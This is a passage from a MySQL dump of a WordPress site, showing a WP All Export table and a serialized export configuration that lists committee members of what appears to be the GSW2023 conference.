/*!40000 ALTER TABLE `dnctiavkr_options` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_pmxe_exports`
--

DROP TABLE IF EXISTS `dnctiavkr_pmxe_exports`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_pmxe_exports` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `parent_id` bigint(20) NOT NULL DEFAULT 0,
  `attch_id` bigint(20) NOT NULL DEFAULT 0,
  `options` longtext DEFAULT NULL,
  `scheduled` varchar(64) NOT NULL DEFAULT '',
  `registered_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `friendly_name` text NOT NULL DEFAULT '',
  `exported` bigint(20) NOT NULL DEFAULT 0,
  `canceled` tinyint(1) NOT NULL DEFAULT 0,
  `canceled_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `settings_update_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `last_activity` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `processing` tinyint(1) NOT NULL DEFAULT 0,
  `executing` tinyint(1) NOT NULL DEFAULT 0,
  `triggered` tinyint(1) NOT NULL DEFAULT 0,
  `iteration` bigint(20) NOT NULL DEFAULT 0,
  `export_post_type` text NOT NULL DEFAULT '',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp(),
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_pmxe_exports`
--

LOCK TABLES `dnctiavkr_pmxe_exports` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_pmxe_exports` DISABLE KEYS */;
INSERT INTO `dnctiavkr_pmxe_exports` VALUES
(1,0,0,'a:88:{s:14:\"is_user_export\";b:0;s:17:\"is_comment_export\";b:0;s:18:\"is_taxonomy_export\";b:0;s:3:\"cpt\";a:1:{i:0;s:7:\"dt_team\";}s:11:\"whereclause\";s:0:\"\";s:10:\"joinclause\";a:0:{}s:11:\"exportquery\";O:8:\"WP_Query\":57:{s:5:\"query\";a:5:{s:9:\"post_type\";a:1:{i:0;s:7:\"dt_team\";}s:11:\"post_status\";s:3:\"any\";s:7:\"orderby\";s:2:\"ID\";s:5:\"order\";s:3:\"ASC\";s:14:\"posts_per_page\";i:10;}s:10:\"query_vars\";a:67:{s:9:\"post_type\";a:1:{i:0;s:7:\"dt_team\";}s:11:\"post_status\";s:3:\"any\";s:7:\"orderby\";s:2:\"ID\";s:5:\"order\";s:3:\"ASC\";s:14:\"posts_per_page\";i:10;s:5:\"error\";s:0:\"\";s:1:\"m\";s:0:\"\";s:1:\"p\";i:0;s:11:\"post_parent\";s:0:\"\";s:7:\"subpost\";s:0:\"\";s:10:\"subpost_id\";s:0:\"\";s:10:\"attachment\";s:0:\"\";s:13:\"attachment_id\";i:0;s:4:\"name\";s:0:\"\";s:8:\"pagename\";s:0:\"\";s:7:\"page_id\";i:0;s:6:\"second\";s:0:\"\";s:6:\"minute\";s:0:\"\";s:4:\"hour\";s:0:\"\";s:3:\"day\";i:0;s:8:\"monthnum\";i:0;s:4:\"year\";i:0;s:1:\"w\";i:0;s:13:\"category_name\";s:0:\"\";s:3:\"tag\";s:0:\"\";s:3:\"cat\";s:0:\"\";s:6:\"tag_id\";s:0:\"\";s:6:\"author\";s:0:\"\";s:11:\"author_name\";s:0:\"\";s:4:\"feed\";s:0:\"\";s:2:\"tb\";s:0:\"\";s:5:\"paged\";i:0;s:8:\"meta_key\";s:0:\"\";s:10:\"meta_value\";s:0:\"\";s:7:\"preview\";s:0:\"\";s:1:\"s\";s:0:\"\";s:8:\"sentence\";s:0:\"\";s:5:\"title\";s:0:\"\";s:6:\"fields\";s:0:\"\";s:10:\"menu_order\";s:0:\"\";s:5:\"embed\";s:0:\"\";s:12:\"category__in\";a:0:{}s:16:\"category__not_in\";a:0:{}s:13:\"category__and\";a:0:{}s:8:\"post__in\";a:0:{}s:12:\"post__not_in\";a:0:{}s:13:\"post_name__in\";a:0:{}s:7:\"tag__in\";a:0:{}s:11:\"tag__not_in\";a:0:{}s:8:\"tag__and\";a:0:{}s:12:\"tag_slug__in\";a:0:{}s:13:\"tag_slug__and\";a:0:{}s:15:\"post_parent__in\";a:0:{}s:19:\"post_parent__not_in\";a:0:{}s:10:\"author__in\";a:0:{}s:14:\"author__not_in\";a:0:{}s:14:\"search_columns\";a:0:{}s:19:\"ignore_sticky_posts\";b:0;s:16:\"suppress_filters\";b:0;s:13:\"cache_results\";b:1;s:22:\"update_post_term_cache\";b:1;s:22:\"update_menu_item_cache\";b:0;s:19:\"lazy_load_term_meta\";b:1;s:22:\"update_post_meta_cache\";b:1;s:8:\"nopaging\";b:0;s:17:\"comments_per_page\";s:2:\"50\";s:13:\"no_found_rows\";b:0;}s:9:\"tax_query\";O:12:\"WP_Tax_Query\":6:{s:7:\"queries\";a:0:{}s:8:\"relation\";s:3:\"AND\";s:16:\"\0*\0table_aliases\";a:0:{}s:13:\"queried_terms\";a:0:{}s:13:\"primary_table\";s:15:\"dnctiavkr_posts\";s:17:\"primary_id_column\";s:2:\"ID\";}s:10:\"meta_query\";O:13:\"WP_Meta_Query\":9:{s:7:\"queries\";a:0:{}s:8:\"relation\";N;s:10:\"meta_table\";N;s:14:\"meta_id_column\";N;s:13:\"primary_table\";N;s:17:\"primary_id_column\";N;s:16:\"\0*\0table_aliases\";a:0:{}s:10:\"\0*\0clauses\";a:0:{}s:18:\"\0*\0has_or_relation\";b:0;}s:10:\"date_query\";b:0;s:14:\"queried_object\";N;s:17:\"queried_object_id\";N;s:7:\"request\";s:538:\"\n					SELECT SQL_CALC_FOUND_ROWS  dnctiavkr_posts.ID\n					FROM dnctiavkr_posts \n					WHERE 1=1  AND dnctiavkr_posts.post_type = \'dt_team\' AND ((dnctiavkr_posts.post_status <> \'trash\' AND dnctiavkr_posts.post_status <> \'auto-draft\')) AND dnctiavkr_posts.ID NOT IN (SELECT o.ID FROM dnctiavkr_posts o\n                            LEFT OUTER JOIN dnctiavkr_posts r ON o.post_parent = r.ID WHERE ((r.post_status = \'trash\' OR r.ID IS NULL) AND o.post_type = \'product_variation\'))\n					\n					ORDER BY dnctiavkr_posts.ID ASC\n					LIMIT 0, 10\n				\";s:5:\"posts\";a:10:{i:0;O:7:\"WP_Post\":24:{s:2:\"ID\";i:2487;s:11:\"post_author\";s:1:\"1\";s:9:\"post_date\";s:19:\"2022-10-07 16:52:42\";s:13:\"post_date_gmt\";s:19:\"2022-10-07 16:52:42\";s:12:\"post_content\";s:0:\"\";s:10:\"post_title\";s:58:\"Prof. Jun Chen, National Geomatics Center of China, China.\";s:12:\"post_excerpt\";s:0:\"\";s:11:\"post_status\";s:7:\"publish\";s:14:\"comment_status\";s:6:\"closed\";s:11:\"ping_status\";s:6:\"closed\";s:13:\"post_password\";s:0:\"\";s:9:\"post_name\";s:54:\"prof-jun-chen-national-geomatics-center-of-china-china\";s:7:\"to_ping\";s:0:\"\";s:6:\"pinged\";s:0:\"\";s:13:\"post_modified\";s:19:\"2022-10-14 16:40:25\";s:17:\"post_modified_gmt\";s:19:\"2022-10-14 16:40:25\";s:21:\"post_content_filtered\";s:0:\"\";s:11:\"post_parent\";i:0;s:4:\"guid\";s:50:\"https://gsw2023.com/?post_type=dt_team&#038;p=2487\";s:10:\"menu_order\";i:0;s:9:\"post_type\";s:7:\"dt_team\";s:14:\"post_mime_type\";s:0:\"\";s:13:\"comment_count\";s:1:\"0\";s:6:\"filter\";s:3:\"raw\";}i:1;O:7:\"WP_Post\":24:{s:2:\"ID\";i:2495;s:11:\"post_author\";s:1:\"1\";s:9:\"post_date\";s:19:\"2022-10-07 17:15:44\";s:13:\"post_date_gmt\";s:19:\"2022-10-07 17:15:44\";s:12:\"post_content\";s:61:\"<!-- wp:paragraph -->\n<p>(WG IV/7)</p>\n<!-- /wp:paragraph -->\";s:10:\"post_title\";s:45:\"Prof. Songnian Li, Ryerson University, Canada\";s:12:\"post_excerpt\";s:0:\"\";s:11:\"post_status\";s:7:\"publish\";s:14:\"comment_status\";s:6:\"closed\";s:11:\"ping_status\";s:6:\"closed\";s:13:\"post_password\";s:0:\"\";s:9:\"post_name\";s:42:\"prof-songnian-li-ryerson-university-canada\";s:7:\"to_ping\";s:0:\"\";s:6:\"pinged\";s:0:\"\";s:13:\"post_modified\";s:19:\"2022-12-06 05:24:39\";s:17:\"post_modified_gmt\";s:19:\"2022-12-06 05:24:39\";s:21:\"post_content_filtered\";s:0:\"\";s:11:\"post_parent\";i:0;s:4:\"guid\";s:50:\"https://gsw2023.com/?post_type=dt_team&#038;p=2495\";s:10:\"menu_order\";i:0;s:9:\"post_type\";s:7:\"dt_team\";s:14:\"post_mime_type\";s:0:\"\";s:13:\"comment_count\";s:1:\"0\";s:6:\"filter\";s:3:\"raw\";}i:2;O:7:\"WP_Post\":24:{s:2:\"ID\";i:2498;s:11:\"post_author\";s:1:\"1\";s:9:\"post_date\";s:19:\"2022-10-07 17:25:09\";s:13:\"post_date_gmt\";s:19:\"2022-10-07 17:25:09\";s:12:\"post_content\";s:0:\"\";s:10:\"post_title\";s:58:\"Prof. Maria Antonia Brovelli, Politecnico di Milano, Italy\";s:12:\"post_excerpt\";s:0:\"\";s:11:\"post_status\";s:7:\"publish\";s:14:\"comment_status\";s:6:\"closed\";s:11:\"ping_status\";s:6:\"closed\";s:13:\"post_password\";s:0:\"\";s:9:\"post_name\";s:55:\"prof-maria-antonia-brovelli-politecnico-di-milano-italy\";s:7:\"to_ping\";s:0:\"\";s:6:\"pinged\";s:0:\"\";s:13:\"post_modified\";s:19:\"2022-10-09 05:38:12\";s:17:\"post_modified_gmt\";s:19:\"2022-10-09 05:38:12\";s:21:\"post_content_filtered\";s:0:\"\";s:11:\"post_parent\";i:0;s:4:\"guid\";s:50:\"https://gsw2023.com/?post_type=dt_team&#038;p=2498\";s:10:\"menu_order\";i:0;s:9:\"post_type\";s:7:\"dt_team\";s:14:\"post_mime_type\";s:0:\"\";s:13:\"comment_count\";s:1:\"0\";s:6:\"filter\";s:3:\"raw\";}i:3;O:7:\"WP_Post\":24:{s:2:\"ID\";i:2500;s:11:\"post_author\";s:1:\"1\";s:9:\"post_date\";s:19:\"2022-10-07 17:26:06\";s:13:\"post_date_gmt\";s:19:\"2022-10-07 17:26:06\";s:12:\"post_content\";s:0:\"\";s:10:\"post_title\";s:46:\"Dr. Hao Wu, National Geomatics Center of China\";s:12:\"post_excerpt\";s:0:\"\";s:11:\"post_status\";s:7:\"publish\";s:14:\"comment_status\";s:6:\"closed\";s:11:\"ping_status\";s:6:\"closed\";s:13:\"post_password\";s:0:\"\";s:9:\"post_name\";s:44:\"dr-hao-wu-national-geomatics-center-of-china\";s:7:\"to_ping\";s:0:\"\";s:6:\"pinged\";s:0:\"\";s:13:\"post_modified\";s:19:\"2022-10-09 05:38:43\";s:17:\"post_modified_gmt\";s:19:\"2022-10-09 05:38:43\";s:21:\"post_content_filtered\";s:0:\"\";s:11:\"post_parent\";i:0;s:4:\"guid\";s:50:\"https://gsw2023.com/?post_type=dt_team&#038;p=2500\";s:10:\"menu_order\";i:0;s:9:\"post_type\";s:7:\"dt_team\";s:14:\"post_mime_type\";s:0:\"\";s:13:\"comment_count\";s:1:\"0\";s:6:\"filter\";s:3:\"raw\";}i:4;O:7:\"WP_Post\":24:{s:2:\"ID\";i:2503;s:11:\"post_author\";s:1:\"1\";s:9:\"post_date\";s:19:\"2022-10-07 17:28:08\";s:13:\"post_date_gmt\";s:19:\"2022-10-07 17:28:08\";s:12:\"post_content\";s:0:\"\";s:10:\"post_title\";s:49:\"Dr. Dongyang Hou, Central South University, China\";s:12:\"post_excerpt\";s:0:\"\";s:11:\"post_status\";s:7:\"publish\";s:14:\"comment_status\";s:6:\"closed\";s:11:\"ping_status\";s:6:\"closed\";s:13:\"post_password\";s:0:\"\";s:9:\"post_name\";s:46:\"dr-dongyang-hou-central-south-university-china\";s:7:\"to_ping\";s:0:\"\";s:6:\"pinged\";s:0:\"\";s:13:\"post_modified\";s:19:\"2022-10-09 05:48:22\";s:17:\"post_modified_gmt\";s:19:\"2022-10-09 05:48:22\";s:21:\"post_content_filtered\";s:0:\"\";s:11:\"post_parent\";i:0;s:4:\"guid\";s:50:\"https://gsw2023.com/?post_type=dt_team&#038;p=2503\";s:10:\"menu_order\";i:0;s:9:\"post_type\";s:7:\"dt_team\";s:14:\"post_mime_type\";s:0:\"\";s:13:\"comment_count\";s:1:\"0\";s:6:\"filter\";s:3:\"raw\";}i:5;O:7:\"WP_Post\":24:{s:2:\"ID\";i:2521;s:11:\"post_author\";s:1:\"1\";s:9:\"post_date\";s:19:\"2022-10-07 18:59:18\";s:13:\"post_date_gmt\";s:19:\"2022-10-07 18:59:18\";s:12:\"post_content\";s:63:\"<!-- wp:paragraph -->\n<p>(ICWG I/IV)</p>\n<!-- /wp:paragraph -->\";s:10:\"post_title\";s:26:\"Ville Lehtola, Netherlands\";s:12:\"post_excerpt\";s:0:\"\";s:11:\"post_status\";s:7:\"publish\";s:14:\"comment_status\";s:6:\"closed\";s:11:\"ping_status\";s:6:\"closed\";s:13:\"post_password\";s:0:\"\";s:9:\"post_name\";s:35:\"ville-lehtola-netherlands-icwg-i-iv\";s:7:\"to_ping\";s:0:\"\";s:6:\"pinged\";s:0:\"\";s:13:\"post_modified\";s:19:\"2022-12-06 05:25:40\";s:17:\"post_modified_gmt\";s:19:\"2022-12-06 05:25:40\";s:21:\"post_content_filtered\";s:0:\"\";s:11:\"post_parent\";i:0;s:4:\"guid\";s:50:\"https://gsw2023.com/?post_type=dt_team&#038;p=2521\";s:10:\"menu_order\";i:0;s:9:\"post_type\";s:7:\"dt_team\";s:14:\"post_mime_type\";s:0:\"\";s:13:\"comment_count\";s:1:\"0\";s:6:\"filter\";s:3:\"raw\";}i:6;O:7:\"WP_Post\":24:{s:2:\"ID\";i:2523;s:11:\"post_author\";s:1:\"1\";s:9:\"post_date\";s:19:\"2022-10-07 19:00:08\";s:13:\"post_date_gmt\";s:19:\"2022-10-07 19:00:08\";s:12:\"post_content\";s:60:\"<!-- wp:paragraph -->\n<p>(WG I/2)</p>\n<!-- /wp:paragraph -->\";s:10:\"post_title\";s:30:\"Andrea Masiero, Italy (WG I/2)\";s:12:\"post_excerpt\";s:0:\"\";s:11:\"post_status\";s:7:\"publish\";s:14:\"comment_status\";s:6:\"closed\";s:11:\"ping_status\";s:6:\"closed\";s:13:\"post_password\";s:0:\"\";s:9:\"post_name\";s:27:\"andrea-masiero-italy-wg-i-2\";s:7:\"to_ping\";s:0:\"\";s:6:\"pinged\";s:0:\"\";s:13:\"post_modified\";s:19:\"2022-12-06 05:31:25\";s:17:\"post_modified_gmt\";s:19:\"2022-12-06 05:31:25\";s:21:\"post_content_filtered\";s:0:\"\";s:11:\"post_parent\";i:0;s:4:\"guid\";s:50:\"https://gsw2023.com/?post_type=dt_team&#038;p=2523\";s:10:\"menu_order\";i:0;s:9:\"post_type\";s:7:\"dt_team\";s:14:\"post_mime_type\";s:0:\"\";s:13:\"comment_count\";s:1:\"0\";s:6:\"filter\";s:3:\"raw\";}i:7;O:7:\"WP_Post\":24:{s:2:\"ID\";i:2525;s:11:\"post_author\";s:1:\"1\";s:9:\"post_date\";s:19:\"2022-10-07 19:00:44\";s:13:\"post_date_gmt\";s:19:\"2022-10-07 19:00:44\";s:12:\"post_content\";s:63:\"<!-- wp:paragraph -->\n<p>(ICWG I/IV)</p>\n<!-- /wp:paragraph -->\";s:10:\"post_title\";s:25:\"Dorota Iwaszczuk, Germany\";s:12:\"post_excerpt\";s:0:\"\";s:11:\"post_status\";s:7:\"publish\";s:14:\"comment_status\";s:6:\"closed\";s:11:\"ping_status\";s:6:\"closed\";s:13:\"post_password\";s:0:\"\";s:9:\"post_name\";s:34:\"dorota-iwaszczuk-germany-icwg-i-iv\";s:7:\"to_ping\";s:0:\"\";s:6:\"pinged\";s:0:\"\";s:13:\"post_modified\";s:19:\"2022-12-06 05:32:19\";s:17:\"post_modified_gmt\";s:19:\"2022-12-06 05:32:19\";s:21:\"post_content_filtered\";s:0:\"\";s:11:\"post_parent\";i:0;s:4:\"guid\";s:50:\"https://gsw2023.com/?post_type=dt_team&#038;p=2525\";s:10:\"menu_order\";i:0;s:9:\"post_type\";s:7:\"dt_team\";s:14:\"post_mime_type\";s:0:\"\";s:13:\"comment_count\";s:1:\"0\";s:6:\"filter\";s:3:\"raw\";}i:8;O:7:\"WP_Post\":24:{s:2:\"ID\";i:2527;s:11:\"post_author\";s:1:\"1\";s:9:\"post_date\";s:19:\"2022-10-07 19:02:08\";s:13:\"post_date_gmt\";s:19:\"2022-10-07 19:02:08\";s:12:\"post_content\";s:153:\"<!-- wp:paragraph -->\n<p>National Cheng Kung University, Taiwan (WG I/2)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\";s:10:\"post_title\";s:14:\"Kai-Wei Chiang\";s:12:\"post_excerpt\";s:0:\"\";s:11:\"post_status\";s:7:\"publish\";s:14:\"comment_status\";s:6:\"closed\";s:11:\"ping_status\";s:6:\"closed\";s:13:\"post_password\";s:0:\"\";s:9:\"post_name\";s:14:\"kai-wei-chiang\";s:7:\"to_ping\";s:0:\"\";s:6:\"pinged\";s:0:\"\";s:13:\"post_modified\";s:19:\"2022-10-09 05:49:14\";s:17:\"post_modified_gmt\";s:19:\"2022-10-09 05:49:14\";s:21:\"post_content_filtered\";s:0:\"\";s:11:\"post_parent\";i:0;s:4:\"guid\";s:50:\"https://gsw2023.com/?post_type=dt_team&#038;p=2527\";s:10:\"menu_order\";i:0;s:9:\"post_type\";s:7:\"dt_team\";s:14:\"post_mime_type\";s:0:\"\";s:13:\"comment_count\";s:1:\"0\";s:6:\"filter\";s:3:\"raw\";}i:9;O:7:\"WP_Post\":24:{s:2:\"ID\";i:2531;s:11:\"post_author\";s:1:\"1\";s:9:\"post_date\";s:19:\"2022-10-07 19:03:47\";s:13:\"post_date_gmt\";s:19:\"2022-10-07 19:03:47\";s:12:\"post_content\";s:133:\"<!-- wp:table -->\n<figure class=\"wp-block-table\"><table><tbody><tr><td>(WG I/8)</td></tr></tbody></table></figure>\n<!-- /wp:table -->\";s:10:\"post_title\";s:36:\"Cheng Wang, Xiamen University, China\";s:12:\"post_excerpt\";s:0:\"\";s:11:\"post_status\";s:7:\"publish\";s:14:\"comment_status\";s:6:\"closed\";s:11:\"ping_status\";s:6:\"closed\";s:13:\"post_password\";s:0:\"\";s:9:\"post_name\";s:41:\"cheng-wang-xiamen-university-china-wg-i-8\";s:7:\"to_ping\";s:0:\"\";s:6:\"pinged\";s:0:\"\";s:13:\"post_modified\";s:19:\"2022-12-06 05:31:51\";s:17:\"post_modified_gmt\";s:19:\"2022-12-06 05:31:51\";s:21:\"post_content_filtered\";s:0:\"\";s:11:\"post_parent\";i:0;s:4:\"guid\";s:50:\"https://gsw2023.com/?post_type=dt_team&#038;p=2531\";s:10:\"menu_order\";i:0;s:9:\"post_type\";s:7:\"dt_team\";s:14:\"post_mime_type\";s:0:\"\";s:13:\"comment_count\";s:1:\"0\";s:6:\"filter\";s:3:\"raw\";}}s:10:\"post_count\";i:10;s:12:\"current_post\";i:-1;s:11:\"before_loop\";b:1;s:11:\"in_the_loop\";b:0;s:4:\"post\";r:108;s:8:\"comments\";N;s:13:\"comment_count\";i:0;s:15:\"current_comment\";i:-1;s:7:\"comment\";N;s:11:\"found_posts\";i:170;s:13:\"max_num_pages\";d:17;s:21:\"max_num_comment_pages\";i:0;s:9:\"is_single\";b:0;s:10:\"is_preview\";b:0;s:7:\"is_page\";b:0;s:10:\"is_archive\";b:0;s:7:\"is_date\";b:0;s:7:\"is_year\";b:0;s:8:\"is_month\";b:0;s:6:\"is_day\";b:0;s:7:\"is_time\";b:0;s:9:\"is_author\";b:0;s:11:\"is_category\";b:0;s:6:\"is_tag\";b:0;s:6:\"is_tax\";b:0;s:9:\"is_search\";b:0;s:7:\"is_feed\";b:0;s:15:\"is_comment_feed\";b:0;s:12:\"is_trackback\";b:0;s:7:\"is_home\";b:0;s:17:\"is_privacy_policy\";b:0;s:6:\"is_404\";b:0;s:8:\"is_embed\";b:0;s:8:\"is_paged\";b:0;s:8:\"is_admin\";b:1;s:13:\"is_attachment\";b:0;s:11:\"is_singular\";b:0;s:9:\"is_robots\";b:0;s:10:\"is_favicon\";b:0;s:13:\"is_posts_page\";b:0;s:20:\"is_post_type_archive\";b:0;s:25:\"\0WP_Query\0query_vars_hash\";s:32:\"d4169b773203f5100b473d9ac3353496\";s:28:\"\0WP_Query\0query_vars_changed\";b:0;s:17:\"thumbnails_cached\";b:0;s:37:\"\0*\0allow_query_attachment_by_filename\";b:0;s:19:\"\0WP_Query\0stopwords\";N;s:23:\"\0WP_Query\0compat_fields\";a:2:{i:0;s:15:\"query_vars_hash\";i:1;s:18:\"query_vars_changed\";}s:24:\"\0WP_Query\0compat_methods\";a:2:{i:0;s:16:\"init_query_flags\";i:1;s:15:\"parse_tax_query\";}}s:11:\"export_type\";s:8:\"specific\";s:21:\"filter_rules_hierarhy\";s:2:\"[]\";s:21:\"product_matching_mode\";s:6:\"strict\";s:17:\"wp_query_selector\";s:8:\"wp_query\";s:18:\"taxonomy_to_export\";s:0:\"\";s:18:\"created_at_version\";s:5:\"1.3.9\";s:23:\"sub_post_type_to_export\";s:0:\"\";s:18:\"is_loaded_template\";s:0:\"\";s:18:\"order_item_per_row\";i:1;s:29:\"order_item_fill_empty_columns\";i:1;s:8:\"filepath\";s:89:\"\\wpallexport\\exports\\d88d4d03c53e6313759f6211dbbb6aa5\\Team-Export-2023-August-31-0613.csv\";s:16:\"current_filepath\";s:157:\"D:\\Inetpub\\vhosts\\hled-eg.com\\gsw2023.com/wp-content/uploads\\wpallexport\\exports\\d88d4d03c53e6313759f6211dbbb6aa5\\current-Team-Export-2023-August-31-0613.csv\";s:10:\"bundlepath\";s:89:\"\\wpallexport\\exports\\d88d4d03c53e6313759f6211dbbb6aa5\\Team-Export-2023-August-31-0613.zip\";s:8:\"wp_query\";s:0:\"\";s:9:\"export_to\";s:3:\"csv\";s:15:\"export_to_sheet\";s:3:\"csv\";s:9:\"delimiter\";s:1:\",\";s:8:\"encoding\";s:5:\"UTF-8\";s:21:\"is_generate_templates\";i:1;s:18:\"is_generate_import\";i:1;s:9:\"import_id\";i:0;s:13:\"template_name\";s:34:\"Team Export - 2023 August 31 06:14\";s:12:\"is_scheduled\";i:0;s:16:\"scheduled_period\";s:0:\"\";s:15:\"scheduled_email\";s:0:\"\";s:8:\"cc_label\";a:8:{i:0;s:2:\"id\";i:1;s:5:\"title\";i:2;s:7:\"content\";i:3;s:7:\"excerpt\";i:4;s:16:\"dt_team_category\";i:5;s:3:\"url\";i:6;s:8:\"filename\";i:7;s:0:\"\";}s:7:\"cc_type\";a:8:{i:0;s:2:\"id\";i:1;s:5:\"title\";i:2;s:7:\"content\";i:3;s:7:\"excerpt\";i:4;s:4:\"cats\";i:5;s:9:\"image_url\";i:6;s:14:\"image_filename\";i:7;s:0:\"\";}s:8:\"cc_value\";a:8:{i:0;s:2:\"id\";i:1;s:5:\"title\";i:2;s:7:\"content\";i:3;s:7:\"excerpt\";i:4;s:16:\"dt_team_category\";i:5;s:3:\"url\";i:6;s:8:\"filename\";i:7;s:0:\"\";}s:7:\"cc_name\";a:8:{i:0;s:2:\"ID\";i:1;s:5:\"Title\";i:2;s:7:\"Content\";i:3;s:7:\"Excerpt\";i:4;s:15:\"Team Categories\";i:5;s:3:\"URL\";i:6;s:8:\"Filename\";i:7;s:0:\"\";}s:6:\"cc_php\";a:8:{i:0;s:1:\"0\";i:1;s:1:\"0\";i:2;s:1:\"0\";i:3;s:1:\"0\";i:4;s:1:\"0\";i:5;s:1:\"0\";i:6;s:1:\"0\";i:7;s:1:\"0\";}s:7:\"cc_code\";a:8:{i:0;s:0:\"\";i:1;s:0:\"\";i:2;s:0:\"\";i:3;s:0:\"\";i:4;s:0:\"\";i:5;s:0:\"\";i:6;s:0:\"\";i:7;s:0:\"\";}s:6:\"cc_sql\";a:8:{i:0;s:1:\"0\";i:1;s:1:\"0\";i:2;s:1:\"0\";i:3;s:1:\"0\";i:4;s:1:\"0\";i:5;s:0:\"\";i:6;s:0:\"\";i:7;s:1:\"0\";}s:10:\"cc_options\";a:8:{i:0;s:1:\"0\";i:1;s:1:\"0\";i:2;s:1:\"0\";i:3;s:1:\"0\";i:4;s:1:\"0\";i:5;s:75:\"{\"is_export_featured\":true,\"is_export_attached\":true,\"image_separator\":\"|\"}\";i:6;s:77:\"{\"is_export_featured\":false,\"is_export_attached\":false,\"image_separator\":\"|\"}\";i:7;s:1:\"0\";}s:11:\"cc_settings\";a:8:{i:0;s:1:\"0\";i:1;s:1:\"0\";i:2;s:36:\"{\"export_images_from_gallery\":false}\";i:3;s:1:\"0\";i:4;s:1:\"0\";i:5;s:1:\"0\";i:6;s:1:\"0\";i:7;s:1:\"0\";}s:13:\"friendly_name\";s:34:\"Team Export - 2023 August 31 06:13\";s:6:\"fields\";a:4:{i:0;s:7:\"default\";i:1;s:5:\"other\";i:2;s:2:\"cf\";i:3;s:4:\"cats\";}s:3:\"ids\";a:8:{i:0;s:1:\"1\";i:1;s:1:\"1\";i:2;s:1:\"1\";i:3;s:1:\"1\";i:4;s:1:\"1\";i:5;s:1:\"1\";i:6;s:1:\"1\";i:7;s:1:\"1\";}s:5:\"rules\";a:0:{}s:21:\"records_per_iteration\";s:2:\"50\";s:11:\"include_bom\";s:1:\"0\";s:17:\"include_functions\";i:1;s:19:\"split_large_exports\";s:1:\"0\";s:25:\"split_large_exports_count\";s:5:\"10000\";s:16:\"split_files_list\";a:0:{}s:12:\"main_xml_tag\";s:4:\"data\";s:14:\"record_xml_tag\";s:4:\"post\";s:16:\"save_template_as\";s:1:\"0\";s:4:\"name\";s:0:\"\";s:21:\"export_only_new_stuff\";s:1:\"0\";s:26:\"export_only_modified_stuff\";s:1:\"0\";s:24:\"creata_a_new_export_file\";s:1:\"0\";s:15:\"attachment_list\";a:0:{}s:21:\"order_include_poducts\";i:0;s:25:\"order_include_all_poducts\";i:0;s:21:\"order_include_coupons\";i:0;s:25:\"order_include_all_coupons\";i:0;s:23:\"order_include_customers\";i:0;s:27:\"order_include_all_customers\";i:0;s:9:\"migration\";s:0:\"\";s:17:\"xml_template_type\";s:6:\"simple\";s:19:\"custom_xml_template\";s:118:\"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<data>\r\n	<!-- BEGIN LOOP -->\r\n	<post>\r\n\r\n	</post>\r\n	<!-- END LOOP -->\r\n</data>\";s:26:\"custom_xml_template_header\";s:0:\"\";s:24:\"custom_xml_template_loop\";s:0:\"\";s:26:\"custom_xml_template_footer\";s:0:\"\";s:27:\"custom_xml_template_options\";a:0:{}s:22:\"custom_xml_cdata_logic\";s:4:\"auto\";s:21:\"show_cdata_in_preview\";s:1:\"0\";s:17:\"export_variations\";s:1:\"1\";s:23:\"export_variations_title\";s:1:\"1\";s:18:\"include_header_row\";i:1;s:9:\"wpml_lang\";s:3:\"all\";s:24:\"enable_export_scheduling\";s:5:\"false\";s:17:\"scheduling_enable\";s:1:\"0\";s:22:\"scheduling_weekly_days\";s:0:\"\";s:17:\"scheduling_run_on\";s:6:\"weekly\";s:22:\"scheduling_monthly_day\";s:0:\"\";s:16:\"scheduling_times\";a:1:{i:0;s:0:\"\";}s:19:\"scheduling_timezone\";s:12:\"Africa/Cairo\";s:15:\"update_previous\";s:1:\"1\";s:4:\"file\";s:0:\"\";s:8:\"tpl_data\";a:5:{s:4:\"name\";s:34:\"Team Export - 2023 August 31 06:14\";s:18:\"is_keep_linebreaks\";i:1;s:13:\"is_leave_html\";i:0;s:14:\"fix_characters\";i:0;s:7:\"options\";a:60:{s:4:\"type\";s:4:\"post\";s:11:\"wizard_type\";s:3:\"new\";s:8:\"deligate\";s:11:\"wpallexport\";s:11:\"custom_type\";s:7:\"dt_team\";s:6:\"status\";s:5:\"xpath\";s:23:\"is_multiple_page_parent\";s:2:\"no\";s:10:\"unique_key\";s:7:\"{id[1]}\";s:3:\"acf\";a:0:{}s:6:\"fields\";a:0:{}s:23:\"is_multiple_field_value\";a:0:{}s:14:\"multiple_value\";a:0:{}s:16:\"fields_delimiter\";a:0:{}s:15:\"update_all_data\";s:3:\"yes\";s:16:\"is_update_status\";i:1;s:15:\"is_update_title\";i:1;s:16:\"is_update_author\";i:1;s:14:\"is_update_slug\";i:1;s:17:\"is_update_content\";i:1;s:17:\"is_update_excerpt\";i:1;s:15:\"is_update_dates\";i:1;s:20:\"is_update_menu_order\";i:1;s:16:\"is_update_parent\";i:1;s:21:\"is_update_attachments\";i:1;s:13:\"is_update_acf\";i:1;s:24:\"is_update_comment_status\";i:0;s:15:\"import_img_tags\";i:1;s:16:\"update_acf_logic\";s:11:\"full_update\";s:8:\"acf_list\";s:0:\"\";s:22:\"is_update_product_type\";i:1;s:20:\"is_update_attributes\";i:1;s:23:\"update_attributes_logic\";s:11:\"full_update\";s:15:\"attributes_list\";s:0:\"\";s:16:\"is_update_images\";i:1;s:23:\"is_update_custom_fields\";i:1;s:26:\"update_custom_fields_logic\";s:11:\"full_update\";s:18:\"custom_fields_list\";s:0:\"\";s:20:\"is_update_categories\";i:1;s:23:\"update_categories_logic\";s:11:\"full_update\";s:15:\"taxonomies_list\";s:0:\"\";s:9:\"export_id\";s:1:\"1\";s:14:\"